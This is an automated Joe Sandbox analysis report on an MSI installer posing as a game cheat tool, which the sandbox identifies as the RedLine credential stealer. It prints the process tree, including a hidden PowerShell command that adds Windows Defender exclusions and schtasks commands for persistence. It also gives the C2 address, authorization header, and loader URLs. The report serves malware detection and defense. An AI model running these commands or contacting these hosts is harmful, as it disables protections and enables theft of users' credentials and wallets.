Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Cheat.Lab.2.7.2.msi

Overview

General Information

Sample Name:Cheat.Lab.2.7.2.msi
Analysis ID:1337697
MD5:5395845c70fd2495f0407291be32201c
SHA1:a76288fe27b9684ed8d141b50aa55437833ed1a2
SHA256:338f6a75e6e11459a5cedb3a2917f9b3f9fcb4991fec84514692b649393ea3bb
Tags:msiRedlineStealer
Infos:

Detection

RedLine
Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Found malware configuration
Drops large PE files
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Adds a directory exclusion to Windows Defender
Found many strings related to Crypto-Wallets (likely being stolen)
Drops executables to the windows directory (C:\Windows) and starts them
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Suspicious powershell command line found
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
May check the online IP address of the machine
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Checks for available system drives (often done to infect USB drives)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
AV process strings found (often used to terminate AV products)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges
Contains functionality to detect virtual machines (SLDT)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • msiexec.exe (PID: 7800 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Cheat.Lab.2.7.2.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 7872 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7920 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding F46D88023010FA67F9BE0B7659EC2472 C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • LuaJIT.exe (PID: 5524 cmdline: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\script.lua MD5: 9CB9E0D0975E51A90BDED2B3BE8FACA9)
    • msiexec.exe (PID: 8092 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding CF599F91F9CA52D79045F3DD2E6AB85B MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 8160 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 2387AF9F5B3315EE543DBCEF741FA41F E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • MSIC01A.tmp (PID: 7232 cmdline: C:\Windows\Installer\MSIC01A.tmp" /EnforcedRunAsAdmin /RunAsAdmin /HideWindow "C:\Program Files\Cheat Lab Inc\Cheat Lab\exclusion.bat MD5: B9545ED17695A32FACE8C3408A6A3553)
      • cmd.exe (PID: 7356 cmdline: C:\Windows\System32\cmd.exe" /C ""C:\Program Files\Cheat Lab Inc\Cheat Lab\exclusion.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7524 cmdline: powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • LuaJIT.exe (PID: 7400 cmdline: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\script.lua MD5: 9CB9E0D0975E51A90BDED2B3BE8FACA9)
    • schtasks.exe (PID: 432 cmdline: schtasks /create /sc daily /st 11:45 /f /tn NotepadUpdateTask_NzEz /tr ""C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exe" "C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\script.lua"" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 1160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 6052 cmdline: schtasks /create /sc daily /st 11:45 /f /tn "LuaJIT" /tr ""C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\script.lua"" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 1196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • connect.exe (PID: 4584 cmdline: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe MD5: ADF3C225DDD9EEB90009F892A9A83D1B)
      • conhost.exe (PID: 7276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • NzEz.exe (PID: 1736 cmdline: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exe C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\script.lua MD5: 9CB9E0D0975E51A90BDED2B3BE8FACA9)
  • LuaJIT.exe (PID: 4128 cmdline: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\script.lua MD5: 9CB9E0D0975E51A90BDED2B3BE8FACA9)
  • LuaJIT.exe (PID: 6136 cmdline: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\script.lua MD5: 9CB9E0D0975E51A90BDED2B3BE8FACA9)
  • cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": "91.103.252.48:33597", "Bot Id": "c,p", "Authorization Header": "32438af4581b8a75ad1d22d8de993ed9"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000016.00000002.2131526170.000000000040D000.00000004.00000001.01000000.00000008.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        00000016.00000002.2131675948.0000000000462000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                Click to see the 3 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                22.2.connect.exe.400000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  22.2.connect.exe.460000.1.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security

                    Sigma Signatures

                    No Sigma rule has matched

                    Snort Signatures

                    Timestamp:91.103.252.48192.168.2.833597497152046056 11/06/23-15:36:09.338589
                    SID:2046056
                    Source Port:33597
                    Destination Port:49715
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.891.103.252.4849715335972046045 11/06/23-15:36:01.555640
                    SID:2046045
                    Source Port:49715
                    Destination Port:33597
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.891.103.252.4849715335972043231 11/06/23-15:36:12.584768
                    SID:2043231
                    Source Port:49715
                    Destination Port:33597
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:91.103.252.48192.168.2.833597497152043234 11/06/23-15:36:01.858290
                    SID:2043234
                    Source Port:33597
                    Destination Port:49715
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for URL or domain
                    Source: 91.103.252.48:33597Avira URL Cloud: Label: malware
                    Found malware configuration
                    Source: 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: RedLine {"C2 url": "91.103.252.48:33597", "Bot Id": "c,p", "Authorization Header": "32438af4581b8a75ad1d22d8de993ed9"}
                    Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.8:49710 version: TLS 1.2
                    Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Cheat Lab IncJump to behavior
                    Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Cheat Lab Inc\Cheat LabJump to behavior
                    Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Cheat Lab Inc\Cheat Lab\exclusion.batJump to behavior
                    Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeJump to behavior
                    Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Cheat Lab Inc\Cheat Lab\script.luaJump to behavior
                    Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSIC01A.tmp, 00000006.00000000.1435656250.0000000000F77000.00000002.00000001.01000000.00000003.sdmp, MSIC01A.tmp, 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp, Cheat.Lab.2.7.2.msi, MSIC01A.tmp.2.dr, MSIBEB1.tmp.2.dr, 66bc0c.msi.2.dr
                    Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: connect.exe, 00000016.00000002.2145496559.00000000081C2000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: Cheat.Lab.2.7.2.msi, MSIAC8E.tmp.0.dr, MSIBE32.tmp.2.dr, MSIBDB3.tmp.2.dr, MSIAC3E.tmp.0.dr, MSIACBE.tmp.0.dr, MSIAD1D.tmp.0.dr, MSIBD45.tmp.2.dr, MSIAC5E.tmp.0.dr, MSID74E.tmp.0.dr, MSIBE12.tmp.2.dr, MSIAEF5.tmp.0.dr, MSICA9B.tmp.2.dr, MSID76E.tmp.0.dr, MSIAEC5.tmp.0.dr, MSIAEA5.tmp.0.dr, 66bc0c.msi.2.dr, MSIAB91.tmp.0.dr
                    Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: Cheat.Lab.2.7.2.msi, MSIAC8E.tmp.0.dr, MSIBE32.tmp.2.dr, MSIBDB3.tmp.2.dr, MSIAC3E.tmp.0.dr, MSIACBE.tmp.0.dr, MSIAD1D.tmp.0.dr, MSIBD45.tmp.2.dr, MSIAC5E.tmp.0.dr, MSID74E.tmp.0.dr, MSIBE12.tmp.2.dr, MSIAEF5.tmp.0.dr, MSICA9B.tmp.2.dr, MSID76E.tmp.0.dr, MSIAEC5.tmp.0.dr, MSIAEA5.tmp.0.dr, 66bc0c.msi.2.dr, MSIAB91.tmp.0.dr
                    Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSIC01A.tmp, 00000006.00000000.1435656250.0000000000F77000.00000002.00000001.01000000.00000003.sdmp, MSIC01A.tmp, 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp, Cheat.Lab.2.7.2.msi, MSIC01A.tmp.2.dr, MSIBEB1.tmp.2.dr, 66bc0c.msi.2.dr
                    Source: Binary string: C:\JobRelease\win\Release\custact\x86\aischeduler2.pdb source: Cheat.Lab.2.7.2.msi, MSIBEB1.tmp.2.dr, 66bc0d.rbs.2.dr, MSIBE81.tmp.2.dr, MSIBF2F.tmp.2.dr, 66bc0c.msi.2.dr
                    Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: c:Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\userJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppDataJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                    Source: C:\Windows\Installer\MSIC01A.tmpCode function: 6_2_00F6AF79 FindFirstFileExW,6_2_00F6AF79
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h22_2_02633D10
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 4x nop then jmp 026334DAh22_2_026334C2
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 4x nop then jmp 0815ECDFh22_2_0815E978
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 4x nop then inc dword ptr [ebp-20h]22_2_08157048
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 4x nop then jmp 0815E243h22_2_0815DE54
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 4x nop then jmp 08D92CBFh22_2_08D92917
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 4x nop then jmp 08D930B3h22_2_08D92917
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 4x nop then jmp 08D97DEDh22_2_08D97930
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 4x nop then jmp 08D913ECh22_2_08D90C90
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 4x nop then jmp 08D965A7h22_2_08D9533B
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 4x nop then jmp 08D919ABh22_2_08D916D0
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 4x nop then jmp 08D9453Ah22_2_08D94519

                    Networking

                    barindex
                    Snort IDS alert for network traffic
                    Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization) 192.168.2.8:49715 -> 91.103.252.48:33597
                    Source: TrafficSnort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.8:49715 -> 91.103.252.48:33597
                    Source: TrafficSnort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 91.103.252.48:33597 -> 192.168.2.8:49715
                    Source: TrafficSnort IDS: 2046056 ET TROJAN Redline Stealer Activity (Response) 91.103.252.48:33597 -> 192.168.2.8:49715
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: 91.103.252.48:33597
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: unknownDNS query: name: ip-api.com
                    Source: Joe Sandbox ViewASN Name: HOSTGLOBALPLUS-ASRU HOSTGLOBALPLUS-ASRU
                    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                    Source: global trafficTCP traffic: 192.168.2.8:49715 -> 91.103.252.48:33597
                    Source: LuaJIT.exe, 00000009.00000002.1936998576.0000022EB3517000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.37.71.112/
                    Source: LuaJIT.exe, 00000009.00000002.1936998576.0000022EB3517000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.37.71.112/46122658-3693405117-2476756634-1003s
                    Source: LuaJIT.exe, 00000009.00000002.1936998576.0000022EB3517000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.37.71.112/Roaming
                    Source: LuaJIT.exe, 00000009.00000002.1936998576.0000022EB34A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.37.71.112/loader/screen/OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms
                    Source: LuaJIT.exe, 00000009.00000002.1936998576.0000022EB34A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.37.71.112/loader/screen/OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms37
                    Source: LuaJIT.exe, 00000009.00000002.1936998576.0000022EB34A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.37.71.112/loader/screen/OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Msk7y
                    Source: LuaJIT.exe, 00000009.00000002.1936998576.0000022EB34A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.37.71.112/loader/screen/OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Mso8
                    Source: LuaJIT.exe, 00000009.00000002.1936998576.0000022EB3517000.00000004.00000020.00020000.00000000.sdmp, LuaJIT.exe, 00000009.00000002.1936998576.0000022EB34F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.37.71.112/task/OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms
                    Source: LuaJIT.exe, 00000009.00000002.1936998576.0000022EB344D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.37.71.112/task/OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms8
                    Source: LuaJIT.exe, 00000009.00000002.1936998576.0000022EB3517000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.37.71.112/task/OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Msg
                    Source: LuaJIT.exe, 00000009.00000002.1936998576.0000022EB3517000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.37.71.112/task/OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Msscord
                    Source: Cheat.Lab.2.7.2.msi, MSIC01A.tmp.2.dr, MSIBEB1.tmp.2.dr, MSIAC8E.tmp.0.dr, MSIBE32.tmp.2.dr, MSIBDB3.tmp.2.dr, MSIAC3E.tmp.0.dr, 66bc0d.rbs.2.dr, MSIACBE.tmp.0.dr, MSIBE81.tmp.2.dr, MSIAD1D.tmp.0.dr, MSIBD45.tmp.2.dr, MSIAC5E.tmp.0.dr, MSID74E.tmp.0.dr, MSIBF2F.tmp.2.dr, MSIBE12.tmp.2.dr, MSIAEF5.tmp.0.dr, MSICA9B.tmp.2.dr, MSID76E.tmp.0.dr, MSIAEC5.tmp.0.dr, MSIAEA5.tmp.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                    Source: Cheat.Lab.2.7.2.msi, MSIC01A.tmp.2.dr, MSIBEB1.tmp.2.dr, MSIAC8E.tmp.0.dr, MSIBE32.tmp.2.dr, MSIBDB3.tmp.2.dr, MSIAC3E.tmp.0.dr, 66bc0d.rbs.2.dr, MSIACBE.tmp.0.dr, MSIBE81.tmp.2.dr, MSIAD1D.tmp.0.dr, MSIBD45.tmp.2.dr, MSIAC5E.tmp.0.dr, MSID74E.tmp.0.dr, MSIBF2F.tmp.2.dr, MSIBE12.tmp.2.dr, MSIAEF5.tmp.0.dr, MSICA9B.tmp.2.dr, MSID76E.tmp.0.dr, MSIAEC5.tmp.0.dr, MSIAEA5.tmp.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                    Source: LuaJIT.exe, 00000009.00000002.1936998576.0000022EB34C4000.00000004.00000020.00020000.00000000.sdmp, LuaJIT.exe, 00000009.00000002.1936998576.0000022EB344D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cdn.discordapp.com/attachments/1166694393298817025/1171047481182793729/2.txt
                    Source: LuaJIT.exe, 00000009.00000002.1936998576.0000022EB344D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cdn.discordapp.com/attachments/1166694393298817025/1171047481182793729/2.txty
                    Source: LuaJIT.exe, 00000009.00000002.1936998576.0000022EB3517000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
                    Source: Cheat.Lab.2.7.2.msi, MSIC01A.tmp.2.dr, MSIBEB1.tmp.2.dr, MSIAC8E.tmp.0.dr, MSIBE32.tmp.2.dr, MSIBDB3.tmp.2.dr, MSIAC3E.tmp.0.dr, 66bc0d.rbs.2.dr, MSIACBE.tmp.0.dr, MSIBE81.tmp.2.dr, MSIAD1D.tmp.0.dr, MSIBD45.tmp.2.dr, MSIAC5E.tmp.0.dr, MSID74E.tmp.0.dr, MSIBF2F.tmp.2.dr, MSIBE12.tmp.2.dr, MSIAEF5.tmp.0.dr, MSICA9B.tmp.2.dr, MSID76E.tmp.0.dr, MSIAEC5.tmp.0.dr, MSIAEA5.tmp.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                    Source: Cheat.Lab.2.7.2.msi, MSIC01A.tmp.2.dr, MSIBEB1.tmp.2.dr, MSIAC8E.tmp.0.dr, MSIBE32.tmp.2.dr, MSIBDB3.tmp.2.dr, MSIAC3E.tmp.0.dr, 66bc0d.rbs.2.dr, MSIACBE.tmp.0.dr, MSIBE81.tmp.2.dr, MSIAD1D.tmp.0.dr, MSIBD45.tmp.2.dr, MSIAC5E.tmp.0.dr, MSID74E.tmp.0.dr, MSIBF2F.tmp.2.dr, MSIBE12.tmp.2.dr, MSIAEF5.tmp.0.dr, MSICA9B.tmp.2.dr, MSID76E.tmp.0.dr, MSIAEC5.tmp.0.dr, MSIAEA5.tmp.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                    Source: Cheat.Lab.2.7.2.msi, MSIC01A.tmp.2.dr, MSIBEB1.tmp.2.dr, MSIAC8E.tmp.0.dr, MSIBE32.tmp.2.dr, MSIBDB3.tmp.2.dr, MSIAC3E.tmp.0.dr, 66bc0d.rbs.2.dr, MSIACBE.tmp.0.dr, MSIBE81.tmp.2.dr, MSIAD1D.tmp.0.dr, MSIBD45.tmp.2.dr, MSIAC5E.tmp.0.dr, MSID74E.tmp.0.dr, MSIBF2F.tmp.2.dr, MSIBE12.tmp.2.dr, MSIAEF5.tmp.0.dr, MSICA9B.tmp.2.dr, MSID76E.tmp.0.dr, MSIAEC5.tmp.0.dr, MSIAEA5.tmp.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: Cheat.Lab.2.7.2.msi, MSIC01A.tmp.2.dr, MSIBEB1.tmp.2.dr, MSIAC8E.tmp.0.dr, MSIBE32.tmp.2.dr, MSIBDB3.tmp.2.dr, MSIAC3E.tmp.0.dr, 66bc0d.rbs.2.dr, MSIACBE.tmp.0.dr, MSIBE81.tmp.2.dr, MSIAD1D.tmp.0.dr, MSIBD45.tmp.2.dr, MSIAC5E.tmp.0.dr, MSID74E.tmp.0.dr, MSIBF2F.tmp.2.dr, MSIBE12.tmp.2.dr, MSIAEF5.tmp.0.dr, MSICA9B.tmp.2.dr, MSID76E.tmp.0.dr, MSIAEC5.tmp.0.dr, MSIAEA5.tmp.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
